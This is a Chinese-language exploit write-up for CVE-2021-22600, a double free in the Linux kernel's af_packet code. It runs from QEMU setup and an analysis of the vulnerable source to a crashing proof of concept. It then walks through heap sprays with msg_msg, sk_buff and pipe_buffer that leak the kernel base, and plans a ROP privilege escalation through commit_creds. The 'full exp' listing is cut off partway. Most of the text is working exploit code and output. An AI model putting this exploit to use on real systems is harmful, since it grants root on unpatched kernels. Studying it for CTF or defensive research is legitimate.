0%

msg_msg-sk_buff+pipe_buffer attack+CVE-2021-22600

CVE-2021-22600

1
2
/ $ cat /proc/version 
Linux version 5.11.16 (arttnba3@ubuntu) (gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0, GNU ld (GNU Binutils for Ubuntu) 2.34) #1 SMP Sat Jun 3 16:53:03 PDT 2023
1
2
3
4
5
6
7
8
9
10
qemu-system-x86_64 \
-m 256M \
-nographic \
-no-reboot \
-kernel "./bzImage" \
-append "console=ttyS0 qiet loglevel=3 oops=panic panic=-1 pti=on kaslr" \
-monitor /dev/null \
-initrd "./rootfs.cpio" \
-cpu qemu64,+smep,+smap \
-smp cores=1 -s
  • smap,smep,pti,kaslr
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
chown root /root/flag
chgrp root /root/flag
chmod 400 /root/flag

echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

setsid /bin/cttyhack setuidgid 1000 /bin/sh

umount /proc
umount /sys

poweroff -d 0 -f

内核源码下载:Index of /pub/linux/kernel/v5.x/

漏洞分析

本题目的漏洞是 CVE-2021-22600,该漏洞影响版本为:Linux Kernel v5.8.0 - v5.15.0

漏洞位于 /net/packet/af_packet.c 文件,rx_owner_map 引用了 pg_vec,切换到 TPACKET_V3 协议版本中,在 packet_set_ring() 函数的末尾,对 pg_vec 释放了一次,并未对 rx_owner_map 指针置为 NULL

直到从 TPACKET_V3 协议版本切换到 TPACKET_V2 协议版本后,在次到达 packet_set_ring() 函数的末尾,bitmap_free() 函数对 rx_owner_map 指针进行释放,触发 double free 漏洞

核心函数 packet_set_ring 源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
int closing, int tx_ring)
{
struct pgv *pg_vec = NULL;
struct packet_sock *po = pkt_sk(sk);
unsigned long *rx_owner_map = NULL;
int was_running, order = 0;
struct packet_ring_buffer *rb;
struct sk_buff_head *rb_queue;
__be16 num;
int err = -EINVAL;
/* Added to avoid minimal code churn */
struct tpacket_req *req = &req_u->req;

rb = tx_ring ? &po->tx_ring : &po->rx_ring;
rb_queue = tx_ring ? &sk->sk_write_queue : &sk->sk_receive_queue;

err = -EBUSY;
if (!closing) {
if (atomic_read(&po->mapped))
goto out;
if (packet_read_pending(rb))
goto out;
}

if (req->tp_block_nr) { /* 只有第一次调用setsockopt设置RX_RING时才会进入这里 */
unsigned int min_frame_size;

/* Sanity tests and some calculations */
err = -EBUSY;
if (unlikely(rb->pg_vec))
goto out;

switch (po->tp_version) {
case TPACKET_V1:
po->tp_hdrlen = TPACKET_HDRLEN;
break;
case TPACKET_V2:
po->tp_hdrlen = TPACKET2_HDRLEN;
break;
case TPACKET_V3:
po->tp_hdrlen = TPACKET3_HDRLEN;
break;
}

err = -EINVAL;
if (unlikely((int)req->tp_block_size <= 0))
goto out;
if (unlikely(!PAGE_ALIGNED(req->tp_block_size))) /* 注意tp_block_size必须与PAGE_SIZE对齐 */
goto out;
min_frame_size = po->tp_hdrlen + po->tp_reserve;
if (po->tp_version >= TPACKET_V3 &&
req->tp_block_size <
BLK_PLUS_PRIV((u64)req_u->req3.tp_sizeof_priv) + min_frame_size)
goto out;
if (unlikely(req->tp_frame_size < min_frame_size))
goto out;
if (unlikely(req->tp_frame_size & (TPACKET_ALIGNMENT - 1)))
goto out;

rb->frames_per_block = req->tp_block_size / req->tp_frame_size;
if (unlikely(rb->frames_per_block == 0))
goto out;
if (unlikely(rb->frames_per_block > UINT_MAX / req->tp_block_nr))
goto out;
if (unlikely((rb->frames_per_block * req->tp_block_nr) !=
req->tp_frame_nr))
goto out;

err = -ENOMEM;
order = get_order(req->tp_block_size);
pg_vec = alloc_pg_vec(req, order); /* 其中会调用init_prb_bdqc,导致pg_vec被sock->rx_ring->prb_bdqc->pkbdq引用 */
if (unlikely(!pg_vec))
goto out;
switch (po->tp_version) {
case TPACKET_V3:
/* Block transmit is not supported yet */
if (!tx_ring) { /* 只能是RX_RING */
init_prb_bdqc(po, rb, pg_vec, req_u);
} else {
struct tpacket_req3 *req3 = &req_u->req3;

if (req3->tp_retire_blk_tov ||
req3->tp_sizeof_priv ||
req3->tp_feature_req_word) {
err = -EINVAL;
goto out_free_pg_vec;
}
}
break;
default:
if (!tx_ring) {
rx_owner_map = bitmap_alloc(req->tp_frame_nr,
GFP_KERNEL | __GFP_NOWARN | __GFP_ZERO);
if (!rx_owner_map)
goto out_free_pg_vec;
}
break;
}
}
/* Done */
else {
err = -EINVAL;
if (unlikely(req->tp_frame_nr)) /* 第二,三次调用setsockopt设置RX_RING时,tp_frame_nr字段必须为'0',不能直接goto out */
goto out;
}

/* Detach socket from network */
spin_lock(&po->bind_lock);
was_running = po->running;
num = po->num;
if (was_running) {
po->num = 0;
__unregister_prot_hook(sk, false);
}
spin_unlock(&po->bind_lock);

synchronize_net();

err = -EBUSY;
mutex_lock(&po->pg_vec_lock);
if (closing || atomic_read(&po->mapped) == 0) {
err = 0;
spin_lock_bh(&rb_queue->lock);
swap(rb->pg_vec, pg_vec); /*
第一次调用setsockopt设置RX_RING时,pg_vec被交换为NULL没有释放
第二次调用setsockopt设置RX_RING时,pg_vec被换回并释放,同时packet_ring_buffer->prb_bdqc->pkbdq为悬空指针 */
if (po->tp_version <= TPACKET_V2)
swap(rb->rx_owner_map, rx_owner_map); /*
第三次调用setsockopt设置RX_RING时,才会进入这里
由于rx_owner_map成员和prb_bdqc成员属于同一个联合体,因此packet_ring_buffer->rx_owner_map和packet_ring_buffer->prb_bdqc->pkbdq的值相同
rx_owner_map被交换为悬空指针,释放造成double free */
rb->frame_max = (req->tp_frame_nr - 1);
rb->head = 0;
rb->frame_size = req->tp_frame_size;
spin_unlock_bh(&rb_queue->lock);

swap(rb->pg_vec_order, order);
swap(rb->pg_vec_len, req->tp_block_nr);

rb->pg_vec_pages = req->tp_block_size/PAGE_SIZE;
po->prot_hook.func = (po->rx_ring.pg_vec) ?
tpacket_rcv : packet_rcv;
skb_queue_purge(rb_queue);
if (atomic_read(&po->mapped))
pr_err("packet_mmap: vma is busy: %d\n",
atomic_read(&po->mapped));
}
mutex_unlock(&po->pg_vec_lock);

spin_lock(&po->bind_lock);
if (was_running) {
po->num = num;
register_prot_hook(sk);
}
spin_unlock(&po->bind_lock);
if (pg_vec && (po->tp_version > TPACKET_V2)) {
/* Because we don't support block-based V3 on tx-ring */
if (!tx_ring)
prb_shutdown_retire_blk_timer(po, rb_queue);
}

out_free_pg_vec:
bitmap_free(rx_owner_map); /* 释放rx_owner_map */
if (pg_vec)
free_pg_vec(pg_vec, order, req->tp_block_nr); /* 释放pg_vec */
out:
return err;
}

其他次要部分源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
static void init_prb_bdqc(struct packet_sock *po,
struct packet_ring_buffer *rb,
struct pgv *pg_vec,
union tpacket_req_u *req_u)
{
struct tpacket_kbdq_core *p1 = GET_PBDQC_FROM_RB(rb);
struct tpacket_block_desc *pbd;

memset(p1, 0x0, sizeof(*p1));

p1->knxt_seq_num = 1;
p1->pkbdq = pg_vec; /* sock->rx_ring->prb_bdqc->pkbdq引用了pg_vec,造成漏洞的关键行为 */
......
}
1
2
3
4
5
6
7
8
9
10
11
12
13
struct packet_ring_buffer {
struct pgv *pg_vec;
......
union { /* rx_owner_map成员和prb_bdqc成员属于同一个联合体 */
unsigned long *rx_owner_map;
struct tpacket_kbdq_core prb_bdqc;
};
};

struct tpacket_kbdq_core {
struct pgv *pkbdq;
......
};

下面是触发内核报错的 Poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <string.h>
#include <sys/prctl.h>

#include "kernelpwn.h"

#define PAGE_SIZE 0x1000

int main(int argc , char **argv, char **envp)
{
save_status();
bind_core(0);
unshare_setup();

int socket_fd,version,ret;
struct tpacket_req3 req3;
memset(&req3, 0, sizeof(req3));

/* 调用socket函数创建AF_PACKET套接字 */
socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if (socket_fd < 0) {
err_exit("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
}

/* 调用setsockopt设置协议版本为TPACKET_V3 */
version = TPACKET_V3;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version));
if(ret < 0) {
err_exit("[x] failed at setsockopt(PACKET_VERSION)\n");
}

/* 调用setsockopt设置RX_RING(正常给tpacket_req3配置参数) */
req3.tp_sizeof_priv = 0;
req3.tp_block_nr = 0x410 / 8;
req3.tp_block_size = 0x1000;
req3.tp_frame_size = 0x1000;
req3.tp_frame_nr = 0x410 / 8;
req3.tp_retire_blk_tov = 0;
req3.tp_feature_req_word = 0;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3));
if (ret < 0){
err_exit("[-] setsockopt (PACKET_RX_RING)");
}

/* 调用setsockopt设置RX_RING(将tpacket_req3参数的tp_block_nr和tp_frame_nr字段设置为'0') */
req3.tp_sizeof_priv = 0;
req3.tp_block_nr = 0;
req3.tp_block_size = 0;
req3.tp_frame_size = 0;
req3.tp_frame_nr = 0;
req3.tp_retire_blk_tov = 0;
req3.tp_feature_req_word = 0;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3));
if (ret < 0){
err_exit("[-] setsockopt (PACKET_RX_RING)");
}

/* 调用setsockopt设置协议版本为TPACKET_V2 */
version = TPACKET_V2;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version));
if(ret < 0) {
err_exit("[x] failed at setsockopt(PACKET_VERSION)\n");
}

/* 调用setsockopt设置RX_RING(此时tpacket_req参数的tp_block_nr字段必须为'0') */
req3.tp_sizeof_priv = 0;
req3.tp_block_nr = 0;
req3.tp_block_size = 0;
req3.tp_frame_size = 0;
req3.tp_frame_nr = 0;
req3.tp_retire_blk_tov = 0;
req3.tp_feature_req_word = 0;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3));
if (ret < 0){
err_exit("[-] setsockopt (PACKET_RX_RING)");
}

return 0;
}
1
2
3
4
5
6
7
/ $ ./exp
[*] Status has been saved.
[*] Process binded to core 0
[ 48.293367] kernel BUG at mm/slub.c:305!
[ 48.294485] invalid opcode: 0000 [#1] SMP PTI
[ 48.294770] CPU: 0 PID: 122 Comm: exp Not tainted 5.11.16 #1
[ 48.295009] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014

触发过程详解:

  • 第一次调用 setsockopt 设置 RX_RING:
    • 在执行 packet_set_ring 函数过程中,pg_vec 指向 alloc_pg_vec 函数分配的内存,并且调用 init_prb_bdqc 函数(导致 pg_vecsock->rx_ring->prb_bdqc->pkbdq 引用)
    • 调用 swap 函数将 pg_vecsock->rx_ring->pg_vec 交换,函数最后 pg_vec 指向 NULL,没有调用 free
  • 第二次调用 setsockopt 设置 RX_RING:
    • 调用 swap 函数将 pg_vecsock->rx_ring->pg_vec 交换,此时 sock->rx_ring->pg_vec 为 NULL
    • pg_vec 指向上一步骤分配的内存,函数结尾调用 free_pg_vec 释放 pg_vec,此时 packet_ring_buffer->prb_bdqc->pkbdq 成为悬空指针
  • 由于 sock->rx_ring->pg_vec 为 NULL,所以该套接字可以成功切换协议 TPACKET_V2
  • 第三次调用 setsockopt 设置 RX_RING:
    • 再次进入 packet_set_ring 函数,由于已经是 TPACKET_V2 协议,所以调用了 swap 函数交换了 rx_owner_mapsock->rx_ring->rx_owner_map
    • 由于 packet_ring_buffer 结构体的 rx_owner_map 成员和 prb_bdqc 成员属于联合体,所以 sock->rx_ring->rx_owner_mapsock->rx_ring->prb_bdqc->pkbdq 的值相同
    • 之前 packet_ring_buffer->prb_bdqc->pkbdq 成为悬空指针,所以在函数结尾调用 bitmap_free(rx_owner_map),等同于 free 掉 sock->rx_ring->prb_bdqc->pkbdq 这个悬空指针,造成 double free

入侵思路

先泄露内核基地址以绕过 KASLR,由于这里有两次 free,因此我们选择使用 msg_msg + sk_buff 的方法进行泄露

构造消息队列,并分别在每一个消息队列上发送两条消息:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
for (int i = 0; i < MSG_QUEUE_NUM; i++)
{
*(int *)&primary_msg.mtext[0] = MSG_TAG;
*(int *)&primary_msg.mtext[4] = i;
if (write_msg(msqid[i], &primary_msg, sizeof(primary_msg), PRIMARY_MSG_TYPE) < 0)
err_exit("failed to send primary msg!");

*(int *)&secondary_msg.mtext[0] = MSG_TAG;
*(int *)&secondary_msg.mtext[4] = i;
if (write_msg(msqid[i], &secondary_msg, sizeof(secondary_msg), SECONDARY_MSG_TYPE) < 0)
err_exit("failed to send secondary msg!");

if (i == 1024){
do_free_first(socket_fd);
}
}

do_free_second(socket_fd);
  • 内存布局如下:

1701342306217

  • 由于 slub 算法的特性,kmalloc-1k 会被分配到相邻的内存空间,kmalloc-96 会被分配到相邻的内存空间,两者互不干扰
  • msg_queue,primary,secondary 通过 primary_msg->m_listsecondary_msg->m_list 相关联

第一次堆喷:构造 UAF,堆喷 sk_buff 定位 victim 队列

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
   init_socket_array(sk_sockets);
puts("[*] spray sk_buff...");
/* msg_msg->m_ts从'0x400-0x30'被改为'0x400' */
build_msg((struct msg_msg *)fake_secondary_msg, *(uint64_t *)"yhellow", *(uint64_t *)"yhellow", VICTIM_MSG_TYPE, SECONDARY_MSG_SIZE, 0, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!"); /* 有一个sk_buff会命中UAF */

victim_qid = -1;
for (int i = 0; i < MSG_QUEUE_NUM; i++)
{
if (peek_msg(msqid[i], &secondary_msg, sizeof(secondary_msg), 1) < 0){
/* 因为msg_msg被修改导致peek_msg失败(利用这一点可以定位victim_qid) */
printf("[+] victim qid: %d\n", i);
victim_qid = i;
}
}
if (victim_qid == -1)
err_exit("failed to make the UAF in msg queue!");
  • 内存布局如下:

1701342638468

第二次堆喷:堆喷 sk_buff 伪造辅助消息,泄露 primary_msg 地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/* msg_msg->m_ts从'0x400'被改为'0x1000-0x30' */
build_msg((struct msg_msg *)fake_secondary_msg, *(uint64_t*)"yhellow", *(uint64_t*)"yhellow", VICTIM_MSG_TYPE, 0x1000 - sizeof(struct msg_msg), 0, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

if (peek_msg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0)
err_exit("failed to read victim msg!");

if (*(int *)&oob_msg.mtext[SECONDARY_MSG_SIZE+0x10] != MSG_TAG){
err_exit("failed to rehit the UAF object!");
}

nearby_msg = (struct msg_msg*)&oob_msg.mtext[(SECONDARY_MSG_SIZE+0x10) - sizeof(struct msg_msg)];
printf("\033[32m\033[1m[+] addr of primary msg of msg nearby victim: \033[0m0x%lx\n", nearby_msg->m_list.prev);
  • 内存布局如下:

1701342780014

  • 越界读取到相邻辅助消息的 secondary_msg->msg_msg,泄露对应 primary_msg 的地址

第三次堆喷:堆喷 sk_buff 伪造辅助消息,泄露 UAF obj 地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/* msg_msg->next被改为nearby_msg->m_list.prev(泄露的primary_msg地址) */
build_msg((struct msg_msg *)fake_secondary_msg, *(uint64_t*)"yhellow", *(uint64_t*)"yhellow", VICTIM_MSG_TYPE, sizeof(oob_msg.mtext), nearby_msg->m_list.prev - 8, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

puts("[*] arbitrary read on primary msg of msg nearby victim");
if (peek_msg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0)
err_exit("failed to read victim msg!");

if (*(int *)&oob_msg.mtext[0x1000] != MSG_TAG)
err_exit("failed to rehit the UAF object!");

nearby_msg_prim = (struct msg_msg*) &oob_msg.mtext[0x1000 - sizeof(struct msg_msg)];
victim_addr = nearby_msg_prim->m_list.next - 0x400;

printf("\033[32m\033[1m[+] addr of msg next to victim: \033[0m0x%lx\n", nearby_msg_prim->m_list.next);
printf("\033[32m\033[1m[+] addr of msg UAF object: \033[0m0x%lx\n", victim_addr);
  • 内存布局如下:

1701343615421

  • msg_msg data 的 0x1000-0x30 空间使用完毕后,程序就会根据 msg_msg->next 来确定 msg_msgseg data 的位置
  • msg_msg->next 修改为 primary_addr,就可以读取并泄露 primary->m_list.next ,也就是 secondary->msg_msg
  • 最后减去 0x400 就得到 victim_addr 了

第四次堆喷:堆喷 pipe_buffer,泄露内核基址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
   /* msg_msg->m_list被改为victim_addr(指向自身) */
build_msg((struct msg_msg *)fake_secondary_msg, victim_addr, victim_addr, VICTIM_MSG_TYPE, SECONDARY_MSG_SIZE - sizeof(struct msg_msg), 0, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

/* read_msg会导致secondary_msg被释放 */
if (read_msg(msqid[victim_qid], &secondary_msg, sizeof(secondary_msg), VICTIM_MSG_TYPE) < 0)
err_exit("failed to receive secondary msg!");

for (int i = 0; i < PIPE_NUM; i++)
{
if (pipe(pipe_fd[i]) < 0)
err_exit("failed to create pipe!");

if (write(pipe_fd[i][1], "yhellow", 8) < 0)
err_exit("failed to write the pipe!");
}

pipe_buf_ptr = (struct pipe_buffer *) &fake_secondary_msg;
for (int i = 0; i < SOCKET_NUM; i++)
{
for (int j = 0; j < SK_BUFF_NUM; j++)
{
/* 通过sk_buff读取pipe_buffer */
if (read(sk_sockets[i][1], &fake_secondary_msg,
sizeof(fake_secondary_msg)) < 0)
err_exit("failed to release sk_buff!");

if (pipe_buf_ptr->ops > 0xffffffff81000000){
print_hex(pipe_buf_ptr,sizeof(struct pipe_buffer));
printf("\033[32m\033[1m[+] got anon_pipe_buf_ops: \033[0m%p\n", pipe_buf_ptr->ops);
kernel_offset = (uint64_t)pipe_buf_ptr->ops - 0xffffffff8223d800;
kernel_base = 0xffffffff81000000 + kernel_offset;
}
}
}

printf("\033[32m\033[1m[+] kernel base: \033[0m0x%lx \033[32m\033[1moffset: \033[0m0x%lx\n", kernel_base, kernel_offset);
  • 内存布局如下:

1701346455159

  • read_msg 没有设置 MSG_COPY,读取后便会从信息队列中释放 secondary_msg
  • 但是 sk_buff 中的指针并没有置空,导致 pipe_buffersk_buff 分配的区域在同一位置

接下来可以考虑伪造 pipe_buffer,构造 ROP,劫持 RIP,完成提权

1
2
3
4
5
6
pwndbg> p &init_cred
$1 = (struct cred *) 0xffffffff82889040 <init_cred>
pwndbg> p commit_creds
$2 = {int (struct cred *)} 0xffffffff810df150 <commit_creds>
pwndbg> p swapgs_restore_regs_and_return_to_usermode
$3 = {<text variable, no debug info>} 0xffffffff81e00fb0 <common_interrupt_return>

栈迁移的 gadget 有点难找,需要指令错位,但好在各个版本的内核都有这个 gadget:

1
2
3
4
5
6
7
8
.text:FFFFFFFF8130245D 8B 56 5C                      mov     edx, [rsi+5Ch]
.text:FFFFFFFF81302460 85 D2 test edx, edx
.text:FFFFFFFF81302462 0F 8E A0 00 00 00 jle loc_FFFFFFFF81302508
.text:FFFFFFFF81302462
.text:FFFFFFFF81302468 F0 FF 46 60 lock inc dword ptr [rsi+60h]
.text:FFFFFFFF8130246C 4C 8D 6B 0C lea r13, [rbx+0Ch]
.text:FFFFFFFF81302470 4C 89 EF mov rdi, r13 ; lock
.text:FFFFFFFF81302473 E8 E8 EE 9E 00 call _raw_spin_lock ; PIC mode

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <string.h>
#include <sys/prctl.h>

#include "kernelpwn.h"

#define PG_NUM 256
#define PIPE_NUM 8
#define MSG_QUEUE_NUM 4096

#define PRIMARY_MSG_SIZE 96
#define SECONDARY_MSG_SIZE 0x400-0x10

#define PRIMARY_MSG_TYPE 0x31
#define SECONDARY_MSG_TYPE 0x32
#define VICTIM_MSG_TYPE 0x1337
#define OTHER_MSG_TYPE 0x33
#define MSG_TAG 0xAAAAAAAA

#define PAGE_SIZE 0x1000

int do_alloc_pg_vec(uint32_t block_size, uint32_t frame_size,
uint32_t block_nr, uint32_t sizeof_priv, int timeout){
struct tpacket_req3 req3;
memset(&req3, 0, sizeof(req3));
int socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if (socket_fd < 0) {
err_exit("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
}

int version = TPACKET_V3;
int ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version));
if(ret < 0) {
err_exit("[x] failed at setsockopt(PACKET_VERSION)\n");
}

req3.tp_sizeof_priv = sizeof_priv;
req3.tp_block_nr = block_nr;
req3.tp_block_size = block_size;
req3.tp_frame_size = frame_size;
req3.tp_frame_nr = (block_size * block_nr) / frame_size;
req3.tp_retire_blk_tov = timeout;
req3.tp_feature_req_word = 0;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3));
if (ret < 0){
err_exit("[-] setsockopt (PACKET_RX_RING)");
}
return socket_fd;
}


void do_free_first(int socket_fd){
struct tpacket_req3 req3;
memset(&req3, 0, sizeof(req3));
req3.tp_sizeof_priv = 0;
req3.tp_block_nr = 0;
req3.tp_block_size = 0;
req3.tp_frame_size = 0;
req3.tp_frame_nr = 0;
req3.tp_retire_blk_tov = 0;
req3.tp_feature_req_word = 0;
int ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3));
if (ret < 0){
err_exit("[-] setsockopt (PACKET_RX_RING)");
}
}

void do_free_second(int socket_fd){
struct tpacket_req3 req3;
int version = TPACKET_V2;
int ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version));
memset(&req3, 0, sizeof(req3));
if(ret < 0) {
err_exit("[x] failed at setsockopt(PACKET_VERSION)\n");
}

req3.tp_sizeof_priv = 0;
req3.tp_block_nr = 0;
req3.tp_block_size = 0;
req3.tp_frame_size = 0;
req3.tp_frame_nr = 0;
req3.tp_retire_blk_tov = 0;
req3.tp_feature_req_word = 0;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3));
if (ret < 0){
err_exit("[-] setsockopt (PACKET_RX_RING)");
}
}

struct
{
long mtype;
char mtext[PRIMARY_MSG_SIZE - sizeof(struct msg_msg)];
}primary_msg;

struct
{
long mtype;
char mtext[SECONDARY_MSG_SIZE - sizeof(struct msg_msg)];
}secondary_msg;

struct
{
long mtype;
char mtext[0x1000 - sizeof(struct msg_msg) + 0x1000 - sizeof(struct msg_msgseg)];
} oob_msg;

/*
* skb_shared_info need to take 320 bytes at the tail
* so the max size of buf we should send is:
* 1024 - 320 = 704
*/
char fake_secondary_msg[704];

int main(int argc , char **argv, char **envp)
{
int msqid[MSG_QUEUE_NUM];
int packet_fds[PG_NUM];
int sk_sockets[SOCKET_NUM][2];
int pipe_fd[PIPE_NUM][2];
int socket_fd;
uint64_t victim_addr;
uint64_t victim_qid;
struct msg_msg *nearby_msg;
struct msg_msg *nearby_msg_prim;
struct pipe_buffer* pipe_buf_ptr;
struct pipe_buf_operations *ops_ptr;
uint64_t *rop_chain;
int rop_idx;
save_status();
bind_core(0);
unshare_setup();

socket_fd = do_alloc_pg_vec(PAGE_SIZE, 0x800, 0x400/8, 0, 1000);

for (int i = 0; i < MSG_QUEUE_NUM; i++){
if ((msqid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) < 0)
err_exit("failed to create msg_queue!");
}

memset(&primary_msg, 0, sizeof(primary_msg));
memset(&secondary_msg, 0, sizeof(secondary_msg));

for (int i = 0; i < MSG_QUEUE_NUM; i++)
{
*(int *)&primary_msg.mtext[0] = MSG_TAG;
*(int *)&primary_msg.mtext[4] = i;
if (write_msg(msqid[i], &primary_msg, sizeof(primary_msg), PRIMARY_MSG_TYPE) < 0)
err_exit("failed to send primary msg!");

*(int *)&secondary_msg.mtext[0] = MSG_TAG;
*(int *)&secondary_msg.mtext[4] = i;
if (write_msg(msqid[i], &secondary_msg, sizeof(secondary_msg), SECONDARY_MSG_TYPE) < 0)
err_exit("failed to send secondary msg!");

if (i == 1024){
do_free_first(socket_fd);
}
}

do_free_second(socket_fd);

init_socket_array(sk_sockets);
puts("[*] spray sk_buff...");
build_msg((struct msg_msg *)fake_secondary_msg, *(uint64_t *)"yhellow", *(uint64_t *)"yhellow", VICTIM_MSG_TYPE, SECONDARY_MSG_SIZE, 0, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

victim_qid = -1;
for (int i = 0; i < MSG_QUEUE_NUM; i++)
{
if (peek_msg(msqid[i], &secondary_msg, sizeof(secondary_msg), 1) < 0){
printf("[+] victim qid: %d\n", i);
victim_qid = i;
}
}
if (victim_qid == -1)
err_exit("failed to make the UAF in msg queue!");

if (free_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to release sk_buff!");

build_msg((struct msg_msg *)fake_secondary_msg, *(uint64_t*)"yhellow", *(uint64_t*)"yhellow", VICTIM_MSG_TYPE, 0x1000 - sizeof(struct msg_msg), 0, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

if (peek_msg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0)
err_exit("failed to read victim msg!");

if (*(int *)&oob_msg.mtext[SECONDARY_MSG_SIZE+0x10] != MSG_TAG){
err_exit("failed to rehit the UAF object!");
}

nearby_msg = (struct msg_msg*)&oob_msg.mtext[(SECONDARY_MSG_SIZE+0x10) - sizeof(struct msg_msg)];
printf("\033[32m\033[1m[+] addr of primary msg of msg nearby victim: \033[0m0x%lx\n", nearby_msg->m_list.prev);

if (free_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to release sk_buff!");

build_msg((struct msg_msg *)fake_secondary_msg, *(uint64_t*)"yhellow", *(uint64_t*)"yhellow", VICTIM_MSG_TYPE, sizeof(oob_msg.mtext), nearby_msg->m_list.prev - 8, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

puts("[*] arbitrary read on primary msg of msg nearby victim");
if (peek_msg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0)
err_exit("failed to read victim msg!");

if (*(int *)&oob_msg.mtext[0x1000] != MSG_TAG)
err_exit("failed to rehit the UAF object!");

